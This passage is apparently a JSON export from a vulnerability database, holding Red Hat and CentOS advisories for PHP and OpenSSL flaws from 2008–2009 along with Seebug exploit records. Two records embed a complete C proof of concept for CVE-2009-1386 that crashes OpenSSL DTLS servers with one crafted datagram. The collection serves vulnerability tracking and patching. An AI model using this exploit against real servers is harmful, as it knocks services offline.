arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nA cross-site scripting flaw was found in a way PHP reported errors for\ninvalid cookies. If the PHP interpreter had \"display_errors\" enabled, a\nremote attacker able to set a specially-crafted cookie on a victim's system\ncould possibly inject arbitrary HTML into an error message generated by\nPHP. (CVE-2008-5814)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "reporter": "RedHat", "published": "2009-04-06T04:00:00", "type": "redhat", "title": "(RHSA-2009:0338) Moderate: php security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5498", "CVE-2008-5557", "CVE-2008-5814", "CVE-2009-0754"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:43", "id": "RHSA-2009:0338", "href": "https://access.redhat.com/errata/RHSA-2009:0338", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:24:51", "references": ["http://rhn.redhat.com/errata/RHSA-2009-1335.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i386", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-12.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i386", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i386", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i686", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "i686", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "x86_64", "packageName": "openssl-perl", "packageFilename": "openssl-perl-0.9.8e-12.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "x86_64", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "x86_64", "packageName": "openssl-devel", "packageFilename": "openssl-devel-0.9.8e-12.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "any", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "0.9.8e-12.el5", "arch": "any", "packageName": "openssl", "packageFilename": "openssl-0.9.8e-12.el5.src.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2009:1335\n\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a full-strength\ngeneral purpose cryptography library. Datagram TLS (DTLS) is a protocol\nbased on TLS that is capable of securing datagram transport (for example,\nUDP).\n\nMultiple denial of service flaws were discovered in OpenSSL's DTLS\nimplementation. A remote attacker could use these flaws to cause a DTLS\nserver to use excessive amounts of memory, or crash on an invalid memory\naccess or NULL pointer dereference. (CVE-2009-1377, CVE-2009-1378,\nCVE-2009-1379, CVE-2009-1386, CVE-2009-1387)\n\nNote: These flaws only affect applications that use DTLS. Red Hat does not\nship any DTLS client or server applications in Red Hat Enterprise Linux.\n\nAn input validation flaw was found in the handling of the BMPString and\nUniversalString ASN1 string types in OpenSSL's ASN1_STRING_print_ex()\nfunction. An attacker could use this flaw to create a specially-crafted\nX.509 certificate that could cause applications using the affected function\nto crash when printing certificate contents. (CVE-2009-0590)\n\nNote: The affected function is rarely used. No application shipped with Red\nHat Enterprise Linux calls this function, for example.\n\nThese updated packages also fix the following bugs:\n\n* \"openssl smime -verify -in\" verifies the signature of the input file and\nthe \"-verify\" switch expects a signed or encrypted input file. Previously,\nrunning openssl on an S/MIME file that was not encrypted or signed caused\nopenssl to segfault. With this update, the input file is now checked for a\nsignature or encryption. Consequently, openssl now returns an error and\nquits when attempting to verify an unencrypted or unsigned S/MIME file.\n(BZ#472440)\n\n* when generating RSA keys, pairwise tests were called even in non-FIPS\nmode. This prevented small keys from being generated. With this update,\ngenerating keys in non-FIPS mode no longer calls the pairwise tests and\nkeys as small as 32-bits can be generated in this mode. Note: In FIPS mode,\npairwise tests are still called and keys generated in this mode must still\nbe 1024-bits or larger. (BZ#479817)\n\nAs well, these updated packages add the following enhancements:\n\n* both the libcrypto and libssl shared libraries, which are part of the\nOpenSSL FIPS module, are now checked for integrity on initialization of\nFIPS mode. (BZ#475798)\n\n* an issuing Certificate Authority (CA) allows multiple certificate\ntemplates to inherit the CA's Common Name (CN). Because this CN is used as\na unique identifier, each template had to have its own Certificate\nRevocation List (CRL). With this update, multiple CRLs with the same\nsubject name can now be stored in a X509_STORE structure, with their\nsignature field being used to distinguish between them. (BZ#457134)\n\n* the fipscheck library is no longer needed for rebuilding the openssl\nsource RPM. (BZ#475798)\n\nOpenSSL users should upgrade to these updated packages, which resolve these\nissues and add these enhancements.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-September/016149.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-September/016150.html\n\n**Affected packages:**\nopenssl\nopenssl-devel\nopenssl-perl\n\n**Upstream details at:**\n", "edition": 1, "reporter": "CentOS Project", "published": "2009-09-15T19:42:01", "title": "openssl security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1386", "CVE-2009-1379", "CVE-2009-1377", "CVE-2006-7250", "CVE-2009-1387", "CVE-2009-1378", "CVE-2009-0590"], "modified": "2009-09-15T19:42:02", "href": "http://lists.centos.org/pipermail/centos-announce/2009-September/016149.html", "id": "CESA-2009:1335", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-03T18:25:58", "references": ["https://rhn.redhat.com/errata/RHSA-2009-0338.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-gd-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-gd", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-odbc-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-odbc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-dba-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-dba", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-ncurses-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-ncurses", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-pgsql-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-pgsql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-snmp-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-snmp", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-mbstring-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-mbstring", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-mysql-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-bcmath-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-bcmath", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-imap-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-imap", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-5.1.6-23.2.el5_3.src.rpm", "packageName": "php", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-5.1.6-23.2.el5_3.src.rpm", "packageName": "php", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-xml-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-xml", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-common-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-common", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-dba-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-dba", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-ldap-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-ldap", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-mysql-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-pgsql-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-pgsql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-cli-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-cli", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-ldap-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-ldap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-snmp-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-snmp", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-ncurses-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-ncurses", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-xmlrpc-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-xmlrpc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-odbc-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-odbc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-pdo-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-pdo", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-devel-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-bcmath-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-bcmath", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-pdo-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-pdo", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-mbstring-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-mbstring", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-xmlrpc-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-xmlrpc", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-xml-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-xml", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-soap-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-soap", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-gd-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-gd", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-common-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-common", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-imap-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-imap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-cli-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-cli", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-soap-5.1.6-23.2.el5_3.i386.rpm", "packageName": "php-soap", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.1.6-23.2.el5_3", "packageFilename": "php-devel-5.1.6-23.2.el5_3.x86_64.rpm", "packageName": "php-devel", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2009:0338\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nA cross-site scripting flaw was found in a way PHP reported errors for\ninvalid cookies. If the PHP interpreter had \"display_errors\" enabled, a\nremote attacker able to set a specially-crafted cookie on a victim's system\ncould possibly inject arbitrary HTML into an error message generated by\nPHP. (CVE-2008-5814)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015724.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015725.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-0338.html", "edition": 1, "reporter": "CentOS Project", "published": "2009-04-07T13:21:16", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "php security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0754", "CVE-2008-3658", "CVE-2008-3660", "CVE-2008-5814", "CVE-2008-5498", "CVE-2008-5557"], "modified": "2009-04-07T13:21:16", "href": "http://lists.centos.org/pipermail/centos-announce/2009-April/015724.html", "id": "CESA-2009:0338", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T13:55:14", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1378", "CVE-2009-1386"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66601", "id": "SSV:66601", "sourceData": "\n /*\r\n * cve-2009-1386.c\r\n *\r\n * OpenSSL &#60; 0.9.8i DTLS ChangeCipherSpec Remote DoS\r\n * Jon Oberheide &#60;jon@oberheide.org&#62;\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386\r\n *\r\n * OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as\r\n * the first record instead of ClientHello.\r\n *\r\n * Usage:\r\n *\r\n * Pass the host and port of the target DTLS server:\r\n *\r\n * $ gcc cve-2009-1386.c -o cve-2009-1386\r\n * $ ./cve-2009-1386 1.2.3.4 666\r\n *\r\n * Notes:\r\n *\r\n * Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this \r\n * only requires a single ChangeCipherSpec datagram, but affects an older \r\n * version of OpenSSL.\r\n *\r\n */\r\n\r\n#include &#60;stdio.h&#62;\r\n#include &#60;string.h&#62;\r\n#include &#60;stdlib.h&#62;\r\n#include &#60;unistd.h&#62;\r\n#include &#60;errno.h&#62;\r\n#include &#60;netdb.h&#62;\r\n#include &#60;netinet/in.h&#62;\r\n#include &#60;sys/types.h&#62;\r\n#include &#60;sys/stat.h&#62;\r\n#include &#60;sys/socket.h&#62;\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint sock, ret;\r\n\tchar *ptr, *err;\r\n\tstruct hostent *h;\r\n\tstruct sockaddr_in target;\r\n\tchar buf[64];\r\n\r\n\tif (argc &#60; 3) {\r\n\t\terr = &#34;Pass the host and port of the target DTLS server&#34;;\r\n\t\tprintf(&#34;[-] Error: %s\\n&#34;, err);\r\n\t\texit(1);\r\n\t}\r\n\r\n\th = gethostbyname(argv[1]);\r\n\tif (!h) {\r\n\t\terr = &#34;Unknown host specified&#34;;\r\n\t\tprintf(&#34;[-] Error: %s (%s)\\n&#34;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\ttarget.sin_family = h-&#62;h_addrtype;\r\n\tmemcpy(&target.sin_addr.s_addr, h-&#62;h_addr_list[0], h-&#62;h_length);\r\n\ttarget.sin_port = htons(atoi(argv[2]));\r\n\r\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\r\n\tif (sock == -1) {\r\n\t\terr = &#34;Failed creating UDP socket&#34;;\r\n\t\tprintf(&#34;[-] Error: %s (%s)\\n&#34;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = connect(sock, (struct sockaddr *) &target, sizeof(target));\r\n\tif (ret == -1) {\r\n\t\terr = &#34;Failed to connect socket&#34;;\r\n\t\tprintf(&#34;[-] Error: %s (%s)\\n&#34;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemcpy(buf, &#34;\\x14\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01&#34;, 14);\r\n\r\n\tprintf(&#34;[+] Sending DTLS datagram of death at %s:%s...\\n&#34;, argv[1], argv[2]);\r\n\r\n\tsend(sock, buf, 14, 0);\r\n\r\n\tclose(sock);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2009-06-04]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66601", "status": "cve,poc"}, {"lastseen": "2017-11-19T18:48:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2009-06-05T00:00:00", "type": "seebug", "title": "OpenSSL &lt; 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1378", "CVE-2009-1386"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-06-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11530", "id": "SSV:11530", "sourceData": "\n /*\r\n * cve-2009-1386.c\r\n *\r\n * OpenSSL &lt; 0.9.8i DTLS ChangeCipherSpec Remote DoS\r\n * Jon Oberheide &lt;jon@oberheide.org&gt;\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386\r\n *\r\n * OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as\r\n * the first record instead of ClientHello.\r\n *\r\n * Usage:\r\n *\r\n * Pass the host and port of the target DTLS server:\r\n *\r\n * $ gcc cve-2009-1386.c -o cve-2009-1386\r\n * $ ./cve-2009-1386 1.2.3.4 666\r\n *\r\n * Notes:\r\n *\r\n * Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this \r\n * only requires a single ChangeCipherSpec datagram, but affects an older \r\n * version of OpenSSL.\r\n *\r\n */\r\n\r\n#include &lt;stdio.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;unistd.h&gt;\r\n#include &lt;errno.h&gt;\r\n#include &lt;netdb.h&gt;\r\n#include &lt;netinet/in.h&gt;\r\n#include &lt;sys/types.h&gt;\r\n#include &lt;sys/stat.h&gt;\r\n#include &lt;sys/socket.h&gt;\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint sock, ret;\r\n\tchar *ptr, *err;\r\n\tstruct hostent *h;\r\n\tstruct sockaddr_in target;\r\n\tchar buf[64];\r\n\r\n\tif (argc &lt; 3) {\r\n\t\terr = &quot;Pass the host and port of the target DTLS server&quot;;\r\n\t\tprintf(&quot;[-] Error: %s\\n&quot;, err);\r\n\t\texit(1);\r\n\t}\r\n\r\n\th = gethostbyname(argv[1]);\r\n\tif (!h) {\r\n\t\terr = &quot;Unknown host specified&quot;;\r\n\t\tprintf(&quot;[-] Error: %s (%s)\\n&quot;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\ttarget.sin_family = h-&gt;h_addrtype;\r\n\tmemcpy(&amp;target.sin_addr.s_addr, h-&gt;h_addr_list[0], h-&gt;h_length);\r\n\ttarget.sin_port = htons(atoi(argv[2]));\r\n\r\n\tsock = socket(AF_INET, SOCK_DGRAM, 0);\r\n\tif (sock == -1) {\r\n\t\terr = &quot;Failed creating UDP socket&quot;;\r\n\t\tprintf(&quot;[-] Error: %s (%s)\\n&quot;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = connect(sock, (struct sockaddr *) &amp;target, sizeof(target));\r\n\tif (ret == -1) {\r\n\t\terr = &quot;Failed to connect socket&quot;;\r\n\t\tprintf(&quot;[-] Error: %s (%s)\\n&quot;, err, strerror(errno));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemcpy(buf, &quot;\\x14\\xfe\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01&quot;, 14);\r\n\r\n\tprintf(&quot;[+] Sending DTLS datagram of death at %s:%s...\\n&quot;, argv[1], argv[2]);\r\n\r\n\tsend(sock, buf, 14, 0);\r\n\r\n\tclose(sock);\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11530", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "status": "poc"}, {"lastseen": "2017-11-19T18:54:58", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "Bugraq ID: 35001\r\nCVE ID\uff1aCVE-2009-1378\r\nCVE-2009-1377\r\nCNCVE ID\uff1aCNCVE-20091378\r\nCNCVE-20091377\r\n\r\nOpenSSL\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\u3002\r\nOpenSSL\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5bf9\u5e94\u7528\u7a0b\u5e8f\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n-OpenSSL\u5e93\u6ca1\u6709\u6b63\u786e\u9650\u5236\u7f13\u51b2DTLS\u8bb0\u5f55\u7684\u6570\u503c\uff0c\u63d0\u4ea4\u7279\u6b8a\u6784\u5efa\u7684DTLS\u62a5\u6587\u53ef\u5bfc\u81f4\u6d88\u8017\u6240\u6709\u5185\u5b58\u3002\r\n-\u5904\u7406DTLS\u6d88\u606f\u65f6\u5b58\u5728\u9519\u8bef\uff0c\u901a\u8fc7\u53d1\u9001\u5927\u91cf\u4e71\u5e8f\u7684\u63e1\u624b\u6d88\u606f\u53ef\u6d88\u8017\u5927\u91cf\u5185\u5bb9\u3002\n\nOpenSSL Project OpenSSL 0.9.8 k\r\nOpenSSL Project OpenSSL 0.9.8 j\r\nOpenSSL Project OpenSSL 0.9.8 i\r\nOpenSSL Project OpenSSL 0.9.8 h\r\nOpenSSL Project OpenSSL 0.9.8 e\r\nOpenSSL Project OpenSSL 0.9.8 d\r\nOpenSSL Project OpenSSL 0.9.8 c\r\nOpenSSL Project OpenSSL 0.9.8 b\r\nOpenSSL Project OpenSSL 0.9.8 a\r\nOpenSSL Project OpenSSL 0.9.8\r\n+ Gentoo Linux\r\nOpenSSL Project OpenSSL 0.9.8g\r\nOpenSSL Project OpenSSL 0.9.8f\r\nOpenSSL Project OpenSSL 0.9.8 f\n CVS\u5e93\u5df2\u7ecf\u4fee\u8865\u6b64\u6f0f\u6d1e\uff1a\r\n<a href=\"http://cvs.openssl.org/chngview?cn=18187\" target=\"_blank\" rel=external nofollow>http://cvs.openssl.org/chngview?cn=18187</a>\r\n<a href=\"http://cvs.openssl.org/chngview?cn=18188\" target=\"_blank\" rel=external nofollow>http://cvs.openssl.org/chngview?cn=18188</a>", "reporter": "Root", "published": "2009-05-21T00:00:00", "title": "OpenSSL DTLS\u62a5\u6587\u591a\u4e2a\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1377", 